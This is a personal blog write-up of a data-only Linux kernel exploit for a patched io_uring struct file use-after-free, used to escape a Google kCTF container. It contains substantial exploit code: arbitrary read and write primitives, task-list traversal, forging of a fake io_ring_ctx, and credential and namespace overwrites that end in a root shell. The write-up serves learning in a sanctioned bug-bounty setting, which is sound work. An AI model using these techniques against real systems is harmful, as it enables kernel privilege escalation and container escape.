Escaping the Google kCTF Container with a Data-Only Exploit
Introduction
I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall, and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_uring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up with me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwhile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge; if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.
The Bug
The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.
I won’t go into the bug very much because it wasn’t really important to the exercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files, which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files. In this instance you can see that the check was not performed. So from userspace we are able to open a file (refcount == 1), register the file as a fixed file (refcount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion, will erroneously decrement the refcount (refcount == 1), and then finally call io_uring_unregister_files, which ends up decrementing the refcount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.
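To make the refcount arithmetic concrete, here is a minimal userspace toy model of the four steps. It is not kernel code: struct toy_file, toy_put, and toy_bug_sequence are hypothetical names made up for illustration, and the model only tracks the counter.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy userspace model of a refcounted object; NOT kernel code. */
struct toy_file {
    long refcount;  /* stands in for the file's reference count */
    bool freed;     /* set once the count reaches zero */
};

/* Models a put: drop one reference, "free" the object on the last one. */
void toy_put(struct toy_file *f)
{
    assert(!f->freed && f->refcount > 0);
    if (--f->refcount == 0)
        f->freed = true;
}

/* Walks the four steps from the text. Returns true if the object ends up
 * freed while the (modelled) file descriptor is still open. */
bool toy_bug_sequence(struct toy_file *f)
{
    bool fd_open = true;     /* we never close the fd in this sequence */

    f->refcount = 1;         /* open(): the fd holds one reference */
    f->freed = false;
    f->refcount++;           /* register as a fixed file: refcount == 2 */
    toy_put(f);              /* erroneous put on MSG_RING completion: 1 */
    toy_put(f);              /* unregistering the files: 0, object freed */

    return f->freed && fd_open;
}
```

The point of the model is simply that two puts are paired with one legitimate extra reference, so the reference owned by the open fd is the one that gets dropped.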
What sort of variant analysis can we perform on this type of bug? I’m not so sure; it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase where there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for discrepancies between those routines.
Giant Shoulders
It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called “cross-cache”. file structs have their own dedicated cache in the kernel, so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.
Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my experience. I’m not going to go into too much depth here because this wasn’t any of my doing; this is 100% the people mentioned thus far. Please go read the material from them.
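The "we control the whole page via writes and can read it all back via reads" property is ordinary pipe behaviour and can be seen from userspace without any bug. The sketch below assumes a 4096-byte page and a default-sized pipe; pipe_page_roundtrip is a hypothetical helper name, and nothing here performs the cross-cache step itself.

```c
#include <assert.h>
#include <stddef.h>
#include <unistd.h>

#define PAGE_SZ 4096

/* Write one page worth of bytes into a fresh pipe and read it back.
 * Returns 0 on success, -1 on failure. */
int pipe_page_roundtrip(const unsigned char *in, unsigned char *out)
{
    int fds[2];
    int rc = -1;

    assert(in && out);
    if (pipe(fds) == -1)
        return -1;

    /* A default pipe holds far more than one page, so this does not block. */
    if (write(fds[1], in, PAGE_SZ) == PAGE_SZ) {
        size_t got = 0;
        while (got < PAGE_SZ) {
            ssize_t r = read(fds[0], out + got, PAGE_SZ - got);
            if (r <= 0)
                break;
            got += (size_t)r;
        }
        if (got == PAGE_SZ)
            rc = 0;
    }

    close(fds[0]);
    close(fds[1]);
    return rc;
}
```

In the exploit setting the interesting part is which physical page ends up backing that data, which is what the cross-cache material referenced above covers.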
Arbitrary Read
The first thing I started to look for was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was that I have an open file descriptor at my disposal, so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.
The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.
Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:
static long fcntl_rw_hint(struct file *file, unsigned int cmd,
                          unsigned long arg)
{
    struct inode *inode = file_inode(file);
    u64 __user *argp = (u64 __user *)arg;
    enum rw_hint hint;
    u64 h;

    switch (cmd) {
    case F_GET_RW_HINT:
        h = inode->i_write_hint;
        if (copy_to_user(argp, &h, sizeof(*argp)))
            return -EFAULT;
        return 0;
    case F_SET_RW_HINT:
        if (copy_from_user(&h, argp, sizeof(h)))
            return -EFAULT;
        hint = (enum rw_hint) h;
        if (!rw_hint_valid(hint))
            return -EINVAL;

        inode_lock(inode);
        inode->i_write_hint = hint;
        inode_unlock(inode);
        return 0;
    default:
        return -EINVAL;
    }
}
You can see that in the F_GET_RW_HINT case, a u64 (“h”) is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:
static inline struct inode *file_inode(const struct file *f)
{
    return f->f_inode;
}
Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:
struct file {
    union {
        struct llist_node   fu_llist;
        struct rcu_head     fu_rcuhead;
    } f_u;
    struct path     f_path;
    struct inode    *f_inode;   /* cached value */
<SNIP>
And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.
struct inode {
    umode_t             i_mode;
    unsigned short      i_opflags;
    kuid_t              i_uid;
    kgid_t              i_gid;
    unsigned int        i_flags;

#ifdef CONFIG_FS_POSIX_ACL
    struct posix_acl    *i_acl;
    struct posix_acl    *i_default_acl;
#endif

    const struct inode_operations   *i_op;
    struct super_block  *i_sb;
    struct address_space    *i_mapping;

#ifdef CONFIG_SECURITY
    void                *i_security;
#endif

    /* Stat data, not accessed from path walking */
    unsigned long       i_ino;
    /*
     * Filesystems may only read i_nlink directly.  They shall use the
     * following functions for modification:
     *
     *    (set|clear|inc|drop)_nlink
     *    inode_(inc|dec)_link_count
     */
    union {
        const unsigned int i_nlink;
        unsigned int __i_nlink;
    };
    dev_t               i_rdev;
    loff_t              i_size;
    struct timespec64   i_atime;
    struct timespec64   i_mtime;
    struct timespec64   i_ctime;
    spinlock_t          i_lock; /* i_blocks, i_bytes, maybe i_size */
    unsigned short      i_bytes;
    u8                  i_blkbits;
    u8                  i_write_hint;
<SNIP>
So i_write_hint is a u8, aka a single byte. This is perfect for what we need: inode becomes the address from which we read a byte back to userland (plus the offset to the member).
Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.
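As a rough sketch of how that primitive could be driven: to read the byte at some target address, the fake f_inode has to be the target minus the offset of i_write_hint, and the read itself is a plain fcntl() call on the dangling fd. The two offsets below are assumptions derived from the struct layouts shown above on one x86-64 configuration (they change with kernel version and config), and fake_inode_for, plant_fake_inode, and read_byte_via_hint are hypothetical helper names, not the exploit's own functions.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#ifndef F_GET_RW_HINT
#define F_GET_RW_HINT 1035          /* F_LINUX_SPECIFIC_BASE + 11 */
#endif

/* ASSUMED offsets, for illustration only. */
#define F_INODE_OFF      0x20UL     /* offset of f_inode in struct file */
#define I_WRITE_HINT_OFF 0x8fUL     /* offset of i_write_hint in struct inode */

/* The fake inode pointer that makes inode->i_write_hint land on target. */
uint64_t fake_inode_for(uint64_t target)
{
    return target - I_WRITE_HINT_OFF;
}

/* Plant the fake f_inode into the page image that will be written to the
 * pipe. file_off is the offset of the UAF file within that page. */
void plant_fake_inode(unsigned char *page, size_t file_off, uint64_t target)
{
    uint64_t inode = fake_inode_for(target);

    assert(file_off + F_INODE_OFF + sizeof(inode) <= 4096);
    memcpy(page + file_off + F_INODE_OFF, &inode, sizeof(inode));
}

/* With the page in place, the read is an ordinary fcntl() on the fd.
 * Returns the byte read, or -1 if the call fails. */
int read_byte_via_hint(int uaf_fd)
{
    uint64_t hint = 0;

    if (fcntl(uaf_fd, F_GET_RW_HINT, &hint) == -1)
        return -1;
    return (int)(hint & 0xff);
}
```

Each call yields one byte, so wider values have to be assembled from several reads with the fake inode pointer advanced by one each time.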
This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?
Finding a Read Target
So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot; it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.
cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled, for instance.
After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently, and that was an address inside the error_entry function, which is as follows:
SYM_CODE_START_LOCAL(error_entry)
    UNWIND_HINT_FUNC

    PUSH_AND_CLEAR_REGS save_ret=1
    ENCODE_FRAME_POINTER 8

    testb   $3, CS+8(%rsp)
    jz      .Lerror_kernelspace

    /*
     * We entered from user mode or we're pretending to have entered
     * from user mode due to an IRET fault.
     */
    swapgs
    FENCE_SWAPGS_USER_ENTRY
    /* We have user CR3.  Change to kernel CR3. */
    SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
    IBRS_ENTER
    UNTRAIN_RET

    leaq    8(%rsp), %rdi           /* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:

    /* Put us onto the real thread stack. */
    call    sync_regs
    RET
<SNIP>
error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was the address of the call sync_regs portion of the function. I was never able to confirm which common exceptions/interrupts were taking place on the system and pushing that address onto the stack (presumably when the call was executed), but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least, and the address’ presence in the cpu_entry_area was extremely common, to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.
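Here is a hedged sketch of that KASLR step, driven by a one-byte read primitive. The two constants are the ones from the #defines in the full exploit listing and are specific to that kernel build. The callback type, read_u64_bytewise, kernel_base_from_leak, and the simulated reader are hypothetical names added so the example runs in userspace; the simulated pointer value is made up.

```c
#include <assert.h>
#include <stdint.h>

/* From the exploit's #defines; specific to the targeted kernel build. */
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
#define EE_OFF           0xe0124dUL

/* Hypothetical callback: returns one byte of kernel memory at addr. */
typedef uint8_t (*read_byte_fn)(uint64_t addr);

/* Assemble a little-endian 64-bit value from eight single-byte reads. */
uint64_t read_u64_bytewise(read_byte_fn rd, uint64_t addr)
{
    uint64_t v = 0;

    assert(rd);
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)rd(addr + (uint64_t)i) << (8 * i);
    return v;
}

/* Kernel base from the leaked pointer, or 0 if the result is not page
 * aligned (the slot probably did not hold the expected pointer). */
uint64_t kernel_base_from_leak(uint64_t leaked)
{
    uint64_t base = leaked - EE_OFF;

    return (base & 0xfffUL) ? 0 : base;
}

/* Userspace stand-in for the real primitive: serves the bytes of one
 * simulated stack slot holding a made-up kernel text pointer. */
static const uint64_t sim_slot = 0xffffffff81e0124dUL;

uint8_t sim_read_byte(uint64_t addr)
{
    uint64_t i = addr - ERROR_ENTRY_ADDR;

    return i < 8 ? (uint8_t)(sim_slot >> (8 * i)) : 0;
}
```

With the simulated slot, read_u64_bytewise(sim_read_byte, ERROR_ENTRY_ADDR) reassembles the pointer and kernel_base_from_leak turns it into a page-aligned base. The alignment check is only a cheap sanity test, not proof that the leak is genuine.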
Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.
Where are the Write Gadgets?
I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them looking for calls to copy_to_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscall allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.
I couldn’t use this technique for my personally imposed challenge though, since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.
This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.
Looking for instances where the file->private_data was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from req->file->private_data. Since we control the fake file, we can control the private_data contents (a pointer to a fake io_ring_ctx in this case).
io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve an io_uring_cqe struct from our potentially faked io_ring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.
Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_ring_ctx:
static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
    /* order cqe stores with ring update */
    smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}
This is basically a memcpy: we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->rings->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.
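Since the gadget writes 4 bytes at a time, overwriting a pointer takes two of them. The sketch below models that in userspace. The 0xc0 offset of cq.tail comes from the comment in the exploit's own setup code. The callback type, rings_for, write8_as_two, and the simulated memory are hypothetical and for illustration only, and the byte order assumes a little-endian machine such as x86-64.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Offset of cq.tail from the rings base, per the exploit's own comment. */
#define CQ_TAIL_OFF 0xc0UL

/* Hypothetical callback performing one 4-byte write at where. */
typedef void (*write4_fn)(uint64_t where, uint32_t what);

/* Value to store in the fake ctx->rings so &ctx->rings->cq.tail == where. */
uint64_t rings_for(uint64_t where)
{
    return where - CQ_TAIL_OFF;
}

/* Build an 8-byte write out of two 4-byte writes, low half first.
 * Between the two calls the target holds a torn, half-updated value. */
void write8_as_two(write4_fn w4, uint64_t where, uint64_t what)
{
    assert(w4);
    w4(where, (uint32_t)(what & 0xffffffffUL));
    w4(where + 4, (uint32_t)(what >> 32));
}

/* Userspace stand-in for kernel memory so the sketch can be run. */
static unsigned char sim_mem[16];

void sim_write4(uint64_t where, uint32_t what)
{
    assert(where + sizeof(what) <= sizeof(sim_mem));
    memcpy(sim_mem + where, &what, sizeof(what));
}
```

The torn intermediate state is worth keeping in mind: anything in the kernel that dereferences the pointer between the two halves sees a value that is neither the old nor the new pointer.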
Exploitation Plan
Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.
I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.
Finding Init
At this point, my goal is to find the host init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and, unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we have broken KASLR with our read of the error_entry address, we can copy those values with our arbitrary read capability since they reside at known addresses (offsets from the init task symbol).
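The address arithmetic for this step is small enough to write down. The offsets are the ones from the #defines in the full exploit listing and only hold for that kernel build. struct task_slots, init_task_addr, and slots_of are hypothetical names used here for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* From the exploit's #defines; valid only for the targeted kernel build. */
#define INIT_OFF      0x18149c0UL   /* kernel base -> init_task */
#define REAL_CRED_OFF 0x720UL       /* task -> task->real_cred */
#define CRED_OFF      0x728UL       /* task -> task->cred */
#define NSPROXY_OFF   0x780UL       /* task -> task->nsproxy */

/* Addresses of the three pointer slots inside one task_struct. */
struct task_slots {
    uint64_t real_cred;
    uint64_t cred;
    uint64_t nsproxy;
};

uint64_t init_task_addr(uint64_t kern_base)
{
    assert(kern_base != 0);
    return kern_base + INIT_OFF;
}

struct task_slots slots_of(uint64_t task)
{
    struct task_slots s = {
        task + REAL_CRED_OFF,
        task + CRED_OFF,
        task + NSPROXY_OFF,
    };
    return s;
}
```

Reading 8 bytes at each slot of the init task gives the "what" values. Calling slots_of on the target task's address later gives the matching "where" addresses for the writes.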
Forging Objects
With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name. This name fits within the task_struct comm field, and so as I traverse through the linked list of tasks on the system, I simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:
void traverse_tasks(void)
{
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    {
        err("Invalid task after init: 0x%lx", current);
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        // Stop once the list wraps back around to init
        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our own comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}
You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember, we need to fake a few objects in memory, like the io_ring_ctx for instance. Usually this is done by crafting objects in the kernel heap and somehow discovering their address with a leak. In my case, I have a whole pipe buffer, which is 4096 bytes of memory, to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time spent printing offsets with printk, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. Since the pipe buffer page is page aligned, I can take the address of our UAF file that we read from the file descriptor table and page align it to get the address of the pipe buffer. So now I know exactly where in memory my pipe buffer is, and I also know at what offset on that page our UAF struct file resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake io_ring_ctx. You can see those functions here, first finding our pipe buffer address:
void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);

    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset of the file within its page
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}
And then determining the location of our scratch space where we will forge the fake io_ring_ctx:
// Here, all we're doing is determining which side of the page the UAF file is
// on. If it sits toward the front of the page (offset below 0x500), the scratch
// space starts at offset 0x500; otherwise it starts at the front of the page
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}
Now we have one more read to do, and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_ring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_ring_ctx by reading its contents into a global buffer. Working now from a good base, our forged object can then be set up properly to perform our arbitrary write. You can see me using the copy and updating the necessary fields here:
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}
Performing Our Writes
Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:
cqe = io_get_cqe(ctx);
if (likely(cqe)) {
    WRITE_ONCE(cqe->user_data, user_data);
    WRITE_ONCE(cqe->res, res);
    WRITE_ONCE(cqe->flags, cflags);
They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just use the 4-byte write inside io_commit_cqring instead. The 4-byte write also caused problems in that at some points current has its creds checked, and with what basically amounted to a torn 8-byte write, we would leave current’s cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.
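The size difference between the two gadgets explains the collateral damage. The three WRITE_ONCE stores cover a 64-bit, a 32-bit, and another 32-bit field, 16 bytes in total, while a pointer slot is 8 bytes. The sketch below uses a stand-in struct that mirrors only those three fields; struct cqe_model and bytes_clobbered_past_pointer are hypothetical names. It assumes the cqe is aimed directly at the pointer being replaced, and which neighbours get hit depends on how the cqe lines up with the target.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for the three fields stored through WRITE_ONCE. */
struct cqe_model {
    uint64_t user_data;
    int32_t  res;
    uint32_t flags;
};

/* How many bytes beyond an 8-byte pointer slot a write of the given size
 * spills into, assuming the write starts exactly at the slot. */
size_t bytes_clobbered_past_pointer(size_t write_size)
{
    assert(write_size > 0);
    return write_size > sizeof(uint64_t) ? write_size - sizeof(uint64_t) : 0;
}
```

Under that assumption the cqe-based gadget spills 8 bytes into whatever follows the slot, while the 4-byte gadget spills nothing, at the cost of needing two writes per pointer.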
Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy, and now our child has all of the same privileges and capabilities, including visibility into the host root file system, that init does. This is perfect, but I still wasn’t able to get the flag!
I started to panic at this point that I had seriously done something wrong. The exploit is FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered that in Andy Nguyen’s blog post, he used his root privileges to explicitly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}
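The setns calls above pass the result of open() straight through. A slightly more defensive variant, sketched here, checks the descriptor and closes it afterwards. join_ns is a hypothetical helper name, and this is just one way the step could be written, not what the exploit does. Outside the exploit the call will normally fail for lack of privileges, which the helper reports like any other error.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE             /* needed for setns() in <sched.h> */
#endif
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <unistd.h>

/* Open a namespace file and join it. Returns 0 on success, -1 on failure
 * with errno describing the open() or setns() error. */
int join_ns(const char *path)
{
    assert(path);

    int fd = open(path, O_RDONLY);
    if (fd == -1)
        return -1;

    int rc = setns(fd, 0);      /* 0: accept any namespace type */
    int saved = errno;          /* close() may overwrite errno */
    close(fd);
    errno = saved;

    return rc;
}
```

A caller would invoke it once per namespace, for example join_ns("/proc/self/ns/mnt"), and bail out on -1.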
And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal. I had some out of band confirmation/paranoia checks I had to leave out, but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux, unlike most of the other fcntl syscall flags. Remember, at that point in the exploit we don’t know enough information to fake any objects in memory, so I’d be dead in the water if that read method was ruined by SELinux.
Conclusion
This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.
// Compile
